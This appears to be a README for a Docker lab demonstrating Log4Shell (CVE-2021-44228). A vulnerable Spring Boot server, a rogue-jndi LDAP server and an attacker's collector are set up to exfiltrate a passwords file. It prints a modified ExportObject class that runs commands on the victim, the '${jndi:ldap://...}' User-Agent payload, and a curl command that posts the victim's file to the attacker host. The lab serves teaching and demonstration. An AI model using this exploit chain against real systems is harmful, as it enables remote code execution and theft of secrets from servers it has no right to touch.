A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker. All components involved are running via Docker.
This is a standard Java server acting as the victim. It's running:
- Java 8u111
- Web Application (Spring Boot 2.6.1)
- Log4J
This server is VULNERABLE using this configuration. Note that Java 8u111 still allows JNDI to load classes from a remote codebase (the com.sun.jndi.ldap.object.trustURLCodebase default was only switched to false in 8u191), which is what lets the class served by the rogue LDAP server be fetched and instantiated on the victim.
Additional information:
- endpoint at /logging (GET) will log the user agent using Log4J
- /foo/passwords.txt exists (the attacker's target)
Content of passwords.txt:
my secret
This is a standard Java server acting as the attacker's data collector. It's running:
- Java 17
- Web Application (Spring Boot 2.6.1)
Additional information:
- endpoint at /receiver (POST) will log the request body
This is an LDAP server powered by rogue-jndi.
Its ExportObject class has been modified so that the command passed via the -c flag gets executed in the constructor, i.e. as soon as the victim instantiates the class it loaded from the attacker:
```java
public class ExportObject {
    // Runs on the victim when the JNDI lookup resolves the reference and the
    // downloaded class is instantiated; Config.command holds the -c argument.
    public ExportObject() {
        try {
            Runtime.getRuntime().exec(Config.command);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
When the vulnerable server resolves the lookup, the LDAP server responds with a reference to this class, which runs the following command when instantiated:
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
This effectively posts the content of /foo/passwords.txt to the malicious receiver's prepared endpoint.
- set up the Docker images by running:
./build.sh
- start the component containers by running:
./start.sh
- trigger the vulnerability by running:
curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
- check the logging output of the malicious receiver component by running:
docker logs --timestamps docker_malicious-receiver_1
There should be the content of the server's passwords.txt file.
- stop the component containers by running:
./stop.sh